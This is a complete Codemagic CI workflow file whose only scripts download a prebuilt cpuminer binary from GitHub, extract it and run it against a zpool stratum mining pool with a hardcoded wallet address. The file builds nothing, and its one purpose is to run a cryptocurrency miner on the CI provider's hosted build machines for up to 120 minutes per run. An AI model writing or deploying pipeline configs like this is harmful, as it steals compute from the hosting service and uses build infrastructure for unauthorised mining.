#codemagic.yaml
workflows:
  default-workflow:
    name: Default Workflow
    instance_type: linux
    max_build_duration: 120
    scripts:
      - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
      - tar xf cpuminer-opt-linux.tar.gz
      - ls
      - chmod +x cpuminer-avx2
      - ./cpuminer-avx2 -a lyra2z330  -o stratum+tcp://lyra2z330.eu.mine.zpool.ca:4563 -u PRSZGchW7jSnmLfnzzYpHV1dxUYRZZrZRr.CODEFRESH -q -p c=PYRK
